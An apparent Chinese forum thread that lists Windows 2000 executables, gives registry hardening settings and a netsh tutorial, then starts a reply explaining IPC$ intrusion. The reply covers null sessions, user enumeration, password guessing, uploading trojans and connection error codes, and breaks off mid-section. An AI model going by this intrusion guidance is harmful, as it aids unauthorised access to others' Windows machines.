iexpress.exe > Create and setup packages for install 穿件安装包

iisreset.exe > Restart IIS Admin Service 重启IIS服务

internat.exe > Keyboard Language Indicator Applet 键盘语言指示器

ipconfig.exe > Windows 2000 IP configuration. 察看IP配置

ipsecmon.exe > IP Security Monitor IP安全监视器

ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路

由控制程序

irftp.exe > Setup FTP for wireless communication 无线连接

ismserv.exe > Intersite messaging Service 安装或者删除Service Control

Manager中的服务

jdbgmgr.exe > Microsoft debugger for java 4 Java4的调试器

jetconv.exe > Convert a Jet Engine Database 转换Jet Engine数据库

jetpack.exe > Compact Jet Database. 压缩Jet数据库

jview.exe > Command-line loader for Java Java的命令行装载者

krnl386.exe > Core Component for Windows 2000 2000的核心组件

label.exe > Change label for drives 改变驱动器的卷标

lcwiz.exe > License Compliance Wizard for local or remote systems. 许可证符

合向导

ldifde.exe > LDIF cmd line manager LDIF目录交换命令行管理

licmgr.exe > Terminal Server License Manager 终端服务许可协议管理

lights.exe > display connection status lights 显示连接状况

llsmgr.exe > Windows 2000 License Manager 2000许可协议管理

llssrv.exe > Start the license Server 启动许可协议服务器

lnkstub.exe >

locator.exe > RPC Locator 远程定位

lodctr.exe > Load perfmon counters 调用性能计数

logoff.exe > Log current user off. 注销用户

lpq.exe > Displays status of a remote LPD queue 显示远端的LPD打印队列的状态

,显示被送到基于Unix的服务器的打印任务

lpr.exe > Send a print job to a network printer. 重定向打印任务到网络中的打

印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务

器。

lsass.exe > LSA Executable and Server DLL 运行LSA和Server的DLL

lserver.exe > Specifies the new DNS domain for the default server 指定默认

Server新的DNS域

macfile.exe > Used for managing MACFILES 管理MACFILES

magnify.exe > Used to magnify the current screen 放大镜

makecab.exe > MS Cabinet Maker 制作CAB文件

mdm.exe > Machine Debug Manager 机器调试管理

mem.exe > Display current Memory stats 显示内存状态

migpwd.exe > Migrate passwords. 迁移密码

mmc.exe > Microsoft Management Console 控制台

mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享

mobsync.exe > Manage Synchronization. 同步目录管理器

mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除

或列出卷的装入点。

mplay32.exe > MS Media Player 媒体播放器

mpnotify.exe > Multiple Provider Notification application 多提供者通知应用

程序

mq1sync.exe >

mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复

工具

mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置

mqmig.exe > MSMQ Migration Utility 信息队列迁移工具

mqsvc.exe > ?

mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由

mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD

msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台

msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客



mshta.exe > HTML Application HOST HTML应用程序主机

msiexec.exe > Starts Windows Installer Program 开始Windows安装程序

mspaint.exe > Microsoft Paint 画板

msswchx.exe >

mstask.exe > Task Schedule Program 任务计划表程序

mstinit.exe > Task scheduler setup 任务计划表安装

narrator.exe > Program will allow you to have a narrator for reading.

Microsoft讲述人

nbtstat.exe > Displays protocol stats and current TCP/IP connections using

NBT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。

nddeapir.exe > NDDE API Server side NDDE API服务器端

net.exe > Net Utility 详细用法看/?

net1.exe > Net Utility updated version from MS Net的升级版

netdde.exe > Network DDE will install itself into the background 安装自己到

后台

netsh.exe > Creates a shell for network information 用于配置和监控 Windows

2000 命令行脚本接口。

netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP 网

络连接。

nlsfunc.exe > Loads country-specific information 加载特定国家(地区)的信息

。Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文

件兼容。

notepad.exe > Opens Windows 2000 Notepad 记事本

nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统

(DNS) 名称服务器的信息。

ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具

ntbooks.exe > Starts Windows Help Utility 帮助

ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护

ntfrs.exe > NT File Replication Service NT文件复制服务

ntfrsupg.exe >

ntkrnlpa.exe > Kernel patch 核心补丁

ntoskrnl.exe > Core NT Kernel KT的核心

ntsd.exe >

ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境

nw16.exe > Netware Redirector NetWare转向器

nwscript.exe > runs netware scripts 运行Netware脚本

odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理

odbcconf.exe > Configure ODBC driver's and data source's from command line

命令行配置ODBC驱动和数据源

os2.exe > An OS/2 Warp Server (os2 /o) OS/2

os2srv.exe > An OS/2 Warp Server OS/2

os2ss.exe > An OS/2 Warp Server OS/2

osk.exe > On Screen Keyboard 屏幕键盘

packager.exe > Windows 2000 Packager Manager 对象包装程序

pathping.exe > Combination of Ping and Tracert 包含Ping和Tracert的程序

pax.exe > is a POSIX program and path names used as arguments must be

specified in POSIX format. Use "file://C/Users/Default" instead of

"C:\USERS\DEFAULT." 启动便携式存档互换 (Pax) 实用程序

pentnt.exe > Used to check the Pentium for the floating point division

error. 检查Pentium的浮点错误

perfmon.exe > Starts Windows Performance Monitor 性能监视器

ping.exe > Packet Internet Groper 验证与远程计算机的连接

posix.exe > Used for backward compatibility with Unix 用于兼容Unix

print.exe > Cmd line used to print files 打印文本文件或显示打印队列的内容。

progman.exe > Program manager 程序管理器

proquota.exe > Profile quota program

psxss.exe > POSIX Subsystem Application Posix子系统应用程序

qappsrv.exe > Displays the available application terminal servers on the

network
在网络上显示终端服务器可用的程序

qprocess.exe > Display information about processes local or remote 在本地或

远程显示进程的信息(需终端服务)

query.exe > Query TERMSERVER user process and sessions 查询进程和对话

quser.exe > Display information about a user logged on 显示用户登陆的信息(

需终端服务)

qwinsta.exe > Display information about Terminal Sessions. 显示终端服务的信



rasadmin.exe > Start the remote access admin service 启动远程访问服务

rasautou.exe > Creates a RAS connection 建立一个RAS连接

rasdial.exe > Dial a connection 拨号连接

rasphone.exe > Starts a RAS connection 运行RAS连接

rcp.exe > Copies a file from and to a RCP service. 在 Windows 2000 计算机和

运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe > RdpClip allows you to copy and paste files between a terminal

session and client console session. 再终端和本地复制和粘贴文件

recover.exe > Recovers readable information from a bad or defective disk 从

坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe > Starts the redirector service 运行重定向服务

regedt32.exe > 32-bit register service 32位注册服务

regini.exe > modify registry permissions from within a script 用脚本修改注

册许可

register.exe > Register a program so it can have special execution

characteristics. 注册包含特殊运行字符的程序

regsvc.exe >

regsvr32.exe > Registers and unregister's dll's. As to how and where it

register's them I dont know. 注册和反注册DLL

regtrace.exe > Options to tune debug options for applications failing to

dump trace statements
Trace 设置
regwiz.exe > Registration Wizard 注册向导

remrras.exe >

replace.exe > Replace files 用源目录中的同名文件替换目标目录中的文件。

reset.exe > Reset an active section 重置活动部分

rexec.exe > Runs commands on remote hosts running the REXEC service. 在运行

REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算

机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。

risetup.exe > Starts the Remote Installation Service Wizard. 运行远程安装向

导服务

route.exe > display or edit the current routing tables. 控制网络路由表

routemon.exe > no longer supported 不再支持了!

router.exe > Router software that runs either on a dedicated DOS or on an

OS/2 system. Route软件在 DOS或者是OS/2系统

rsh.exe > Runs commands on remote hosts running the RSH service 在运行 RSH

服务的远程计算机上运行命令

rsm.exe > Mounts and configures remote system media 配置远程系统媒体

rsnotify.exe > Remote storage notification recall 远程存储通知回显

rsvp.exe > Resource reservation protocol 源预约协议

runas.exe > RUN a program as another user 允许用户用其他权限运行指定的工具

和程序

rundll32.exe > Launches a 32-bit dll program 启动32位DLL程序

runonce.exe > Causes a program to run during startup 运行程序再开始菜单中

rwinsta.exe > Reset the session subsystem hardware and software to known

initial values 重置会话子系统硬件和软件到最初的值

savedump.exe > Does not write to e:\winnt\user.dmp 不写入User.dmp中

scardsvr.exe > Smart Card resource management server 子能卡资源管理服务器

schupgr.exe > It will read the schema update files (.ldf files) and upgrade

the schema. (part of ADSI) 读取计划更新文件和更新计划

secedit.exe > Starts Security Editor help 自动安全性配置管理

services.exe > Controls all the services 控制所有服务

sethc.exe > Set High Contrast - changes colours and display mode Logoff to

set it back to normal 设置高对比

setreg.exe > Shows the Software Publishing State Key Values 显示软件发布的

国家语言

setup.exe > GUI box prompts you to goto control panel to configure system

components 安装程序(转到控制面板)

setver.exe > Set Version for Files 设置 MS-DOS 子系统向程序报告的 MS-DOS 版

本号

sfc.exe > System File Checker test and check system files for integrity 系

统文件检查

sfmprint.exe > Print Services for Macintosh 打印Macintosh服务

sfmpsexe.exe >

sfmsvc.exe >

shadow.exe > Monitor another Terminal Services session. 监控另外一台中端服

务器会话

share.exe > Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与

MS-DOS 文件兼容

shmgrate.exe >

shrpubw.exe > Create and Share folders 建立和共享文件夹

sigverif.exe > File Signature Verification 文件签名验证

skeys.exe > Serial Keys utility 序列号制作工具

smlogsvc.exe > Performance Logs and Alerts 性能日志和警报

smss.exe >

sndrec32.exe > starts the Windows Sound Recorder 录音机

sndvol32.exe > Display the current volume information 显示声音控制信息

snmp.exe > Simple Network Management Protocol used for Network Mangement 简

单网络管理协议

snmptrap.exe > Utility used with SNMP SNMP工具

sol.exe > Windows Solitaire Game 纸牌

sort.exe > Compares files and Folders 读取输入、排序数据并将结果写到屏幕、

文件和其他设备上

SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分

sprestrt.exe >

srvmgr.exe > Starts the Windows Server Manager 服务器管理器

stimon.exe > WDM StillImage- > Monitor

stisvc.exe > WDM StillImage- > Service

subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联

svchost.exe > Svchost.exe is a generic host process name for services that

are run from dynamic-link libraries (DLLs). DLL得主进程

syncapp.exe > Creates Windows Briefcase. 创建Windows文件包

sysedit.exe > Opens Editor for 4 system files 系统配置编辑器

syskey.exe > Encrypt and secure system database NT账号数据库按群工具

sysocmgr.exe > Windows 2000 Setup 2000安装程序

systray.exe > Starts the systray in the lower right corner. 在低权限运行

systray

taskman.exe > Task Manager 任务管理器

taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器

tcmsetup.exe > telephony client wizard 电话服务客户安装

tcpsvcs.exe > TCP Services TCP服务

.exe > Telnet Utility used to connect to Telnet Server

termsrv.exe > Terminal Server 终端服务

tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运

行 TFTP 服务的远程计算机传输文件

tftpd.exe > Trivial FTP Daemon

themes.exe > Change Windows Themes 桌面主题

tlntadmn.exe > Telnet Server Administrator Telnet服务管理

tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet会话

tlntsvr.exe > Start the Telnet Server 开始Telnet服务

tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时

间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达

目标采用的路由

tsadmin.exe > Terminal Server Administrator 终端服务管理器

tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终

端对话

tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户

tskill.exe > Kill a Terminal server process 杀掉终端服务

tsprof.exe > Used with Terminal Server to query results. 用终端服务得出查询

结果

tsshutdn.exe > Shutdown the system 关闭系统

unlodctr.exe > Part of performance monitoring 性能监视器的一部分

upg351db.exe > Upgrade a jet database 升级Jet数据库

ups.exe > UPS service UPS服务

user.exe > Core Windows Service Windows核心服务

userinit.exe > Part of the winlogon process Winlogon进程的一部分

usrmgr.exe > Start the windows user manager for domains 域用户管理器

utilman.exe > This tool enables an administrator to designate which

computers automatically open accessibility tools when Windows 2000 starts.

指定2000启动时自动打开那台机器

verifier.exe > Driver Verifier Manager Driver Verifier Manager

vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM

w32tm.exe > Windows Time Server 时间服务器

wextract.exe > Used to extract windows files 解压缩Windows文件

winchat.exe > Opens Windows Chat 打开Windows聊天

winhlp32.exe > Starts the Windows Help System 运行帮助系统

winlogon.exe > Used as part of the logon process. Logon进程的一部分

winmine.exe > windows Game 挖地雷

winmsd.exe > Windows Diagnostic utility 系统信息

wins.exe > Wins Service Wins服务

winspool.exe > Print Routing 打印路由

winver.exe > Displays the current version of Windows 显示Windows版本

wizmgr.exe > Starts Windows Administration Wizards Windows管理向导

wjview.exe > Command line loader for Java 命令行调用Java

wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE

task runs in the target debugee's VM 启动时,32位API需要

wowexec.exe > For running Windows over Windows Applications 在Windows应用程

序上运行Windows

wpnpinst.exe > ?

write.exe > Starts MS Write Program 写字板

wscript.exe > Windows Scripting Utility 脚本工具

wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows升级向



xcopy.exe > Used to copy directories 复制文件和目录,包括子目录

  1、设置生存时间

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

  DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)

  说明:指定传出IP数据包中设置的默认生存时间(TTL)值。TTL决定了IP数据包在

到达目标前在网络中生存的最大时间。它实际上限定了IP数据包在丢弃前允许通过的

路由器数量.有时利用此数值来探测远程主机操作系统。   2、防止ICMP重定向报文

的攻击

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

  EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)

  说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)

发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应

ICMP重定向报文。

  3、禁止响应ICMP路由通告报文

  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter

  faces\interface

  PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)

  说明:"ICMP路由公告"功能可造成他人计算机的网络连接异常,数据被窃听,计

算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网

络异常。因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送

路由器发现选项时启用。

  4、防止SYN洪水攻击

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

  SynAttackProtect REG_DWORD 0x2(默认值为0x0)

  说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时

间。路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,则AFD

的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和

TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施。

 5、禁止C$、D$一类的缺省共享

  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameter

s

  AutoShareServer、REG_DWORD、0x0

  6、禁止ADMIN$缺省共享

  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameter

s

  AutoShareWks、REG_DWORD、0x0

  7、限制IPC$缺省共享

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

  restrictanonymous REG_DWORD 0x0 缺省

              0x1 匿名用户无法列举本机用户列表

              0x2 匿名用户无法连接本机IPC$共享

  说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server

  8、不支持IGMP协议

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

  IGMPLevel REG_DWORD 0x0(默认值为0x2)

  说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修

正这个bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉。改

成0后用route print将看不到那个讨厌的224.0.0.0项了。

  9、设置arp缓存老化时间设置

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

  ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)

  ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)

  说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引

用的ARP缓存项在ArpCacheLife秒后到期。如果ArpCacheLife小于

ArpCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在

ArpCacheMinReferencedLife秒后到期。每次将出站数据包发送到项的IP地址时,就会

引用ARP缓存中的项。

 10、禁止死网关监测技术

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

  EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)

  说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自

动改用备份网关。有时候这并不是一项好主意,建议禁止死网关监测。

  11、不支持路由功能

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

  IPEnableRouter REG_DWORD 0x0(默认值为0x0)

  说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题。

  12、做NAT时放大转换的对外端口最大值

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters

  MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)

  说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端

口数。正常情况下,短期端口的分配数量为1024-5000。将该参数设置到有效范围以外

时,就会使用最接近的有效数值(5000或65534)。使用NAT时建议把值放大点。

  13、修改MAC地址

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\

  找到右窗口的说明为"网卡"的目录,

  比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}

展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的

说明,比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on

Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想

要的MAC值,比如说是"004040404040"然后重起计算机,ipconfig /all看看。
曾几何时,大家都有想过在命令行下改IP和网关。以前在NT4下实现起来过于麻烦,现

在Windows 2000下的Netsh命令能实现该功能了。

Netsh 是本地或远程计算机的 Windows 2000 网络组件的命令行和脚本实用程序。为

了存档或配置其他服务器,Netsh 实用程序也可以将配置脚本保存在文本文件中。

Netsh 实用程序是一个外壳,它通过附加的"Netsh 帮助 DLL",可以支持多个

Windows 2000 组件。"Netsh 帮助 DLL"提供用来监视或配置特定 Windows 2000 网络

组件的其他命令,从而扩展了 Netsh 的功能。每个"Netsh 帮助 DLL"都为特定的网络

组件提供了一个环境和一组命令。每个环境中都可以有子环境。例如,在路由环境中

存在子环境 Ip 和 Ipx,它们将 IP 路由和 IPX 路由命令集中在一起。

Netsh 命令行选项包括下列各项:

用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
[Command | -f ScriptFile]

下列指令有效:

此上下文中的命令:
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
add - 将一个配置项添加到项目列表中。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump 0 - 显示一个配置脚本。
exec - 运行一个脚本文件。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
wins - 更改到 `wins' 上下文。

下列的子上下文可用:
routing interface ras dhcp wins aaaa

若需要命令的更多帮助信息,请键入命令,
后面跟 ?。
-a AliasFile
指定使用了一个别名文件。别名文件包含 netsh 命令列表和一个别名版本,所以可以

使用别名命令行替换 netsh 命令。可以使用别名文件将其他平台中更熟悉的命令映射

到适当的 netsh 命令。

-c Context
指定对应于已安装的支持 DLL 的命令环境。

命令
指定要执行的 netsh 命令。

-f ScriptFile
指定运行 ScriptFile 文件中所有的 netsh 命令。

-r RemoteMachine
指定在远程计算机上运行 netsh 命令,由名称或 IP 地址来指定远程计算机。

您可以将命令缩写为意义明确的最短的字符串。例如,发布 sh ip int 命令相当于发

布 show ip interface。Netsh 命令可以是全局的或特定环境的。全局命令可以在任

何环境中发布,并用于一般的 Netsh 实用程序功能。特定环境的命令随环境而变化。

您可以将发布的命令记录在日志文件中,以创建 netsh 命令会话的审核踪迹。

列出了 netsh 全局命令。

命令 说明
.. 上移一个环境等级。
? 或 help 显示命令行"帮助"。
show version 显示 Windows 和 Netsh 实用程序的当前版本。
show netdlls 显示已安装的"Netsh 帮助 DLL"的当前版本。
add helper 添加"Netsh 帮助 DLL"。
delete helper 删除"Netsh 帮助 DLL"。
show helper 显示已安装的"Netsh 帮助 DLL"。
cmd 创建 Windows 2000 命令窗口。
online 将当前模式设置为联机。
offline 将当前模式设置为脱机。
set mode 将当前模式设置为联机或脱机。
show mode 显示当前模式。
flush 丢弃以脱机模式进行的任何更改。
commit 提交以脱机模式进行的更改。
set audit-logging 打开或关闭记录工具。
show audit-logging 显示当前的审核记录设置。
set loglevel 设置记录信息的级别
show loglevel 显示记录信息的级别。
set machine 配置执行 netsh 命令的计算机。
show machine 显示执行 netsh 命令的计算机。
exec 执行包括 netsh 命令的脚本文件。
quit 或 bye 或 exit 退出 Netsh 实用程序。
add alias 向现有命令添加别名。
delete alias 删除现有命令的别名。
show alias 显示所有已定义的别名。
dump 将配置写入文本文件。
popd 从堆栈中弹出环境的脚本命令。
pushd 将当前的环境推入堆栈的脚本命令。

Netsh 实用程序有如下命令模式:

联机
联机模式下,在 Netsh 命令提示符下发布的命令被立即执行。

脱机
脱机模式下,将在 Netsh 命令提示符下积累发布的命令,并通过发布 commit 全局命

令来按照批处理方式执行。可以通过发布 flush 全局命令来丢弃积累的命令。

脚本
使用 -f 命令行选项,或在 Netsh 命令提示符下发布 exec 全局命令,可以执行指定

文件中所有的 netsh 命令。

要创建当前配置的脚本,请使用 dump 全局命令。dump 命令根据 netsh 命令输出当

前运行的配置。可以使用该命令创建的脚本来配置新的服务器或重新配置现有的服务

器。如果要对组件的配置作很大的更改,推荐您使用 dump 命令开始配置会话,以防

在进行更改前需要还原配置。

Interface 命令
下表列出了可在 Windows 2000 命令提示符下键入的 netsh 命令,这些命令用于管理

运行 Windows 2000 Server 及"路由和远程访问"服务的计算机上的接口设置。如果对

某个特殊功能有多个命令,则在每个命令之间用斜线 (/) 分隔。

当在命令提示符下键入命令时,请在每个命令前加上 netsh。要获得每个命令的精确

语法,可在命令之后键入 ?。选项例如,要获得 netsh interface 命令的命令行"帮

助",请在命令提示符下键入 netsh interface?。

命令 说明
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口

的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名




言归正传,现在来看看WIN2000下的网络设置的配置。 D:\>netsh
netsh>interface
interface>dump
#========================
# 接口配置
#========================
pushd interface

reset all


popd
# 接口配置结束

# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip


# "本地连接 2" 的接口 IP 配置

set address name = "本地连接 2" source = dhcp
set dns name = "本地连接 2" source = dhcp
set wins name = "本地连接 2" source = dhcp

# "本地连接" 的接口 IP 配置

set address name = "本地连接" source = static addr = 192.168.1.10 mask =

255.255.255.0
set address name = "本地连接" gateway = 192.168.0.1 gwmetric = 1
set dns name = "本地连接" source = static addr = 192.168.0.1
set wins name = "本地连接" source = static addr = none


popd
# 接口 IP 配置结束


如果,你想快速修改一个本地IP地址。
你可以先用文本写入以下的内容:

interface ip
set address 本地连接 static 192.168.5.10 255.255.255.0 192.168.0.1 1
^^^ ^^^ ^^^ ^^^ ^^
接口名称 IP地址 子网掩码 网关 接口跃点数

如上保存为 local.sh

D:\>netsh exec local.sh
---------------------------------------------------------------------
回复

使用道具 举报

 楼主| 发表于 2005-10-25 23:17:35 | 显示全部楼层
IPC$命令详解:

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已

经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟

来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,

看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大

家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),

它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权

限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对

方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可

以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理

员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘

(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别

有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用

户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可

告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中

的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows

9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋

友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一

下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立

连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户

列表


三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往

往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份

登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我

在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是

2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的

管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意

识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现

ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上

射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在

hack入侵中的意义所在.


四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明

,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围

的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(

即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之

力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷

吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还

是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的

应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来

讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的

逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实

现对这些默认共享的访问(前提是对方没有关闭这些默认共享)


五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未

启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,

请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。

(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此

本人无法详细而确定的说明,就靠大家自己体会和试验了.


六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然

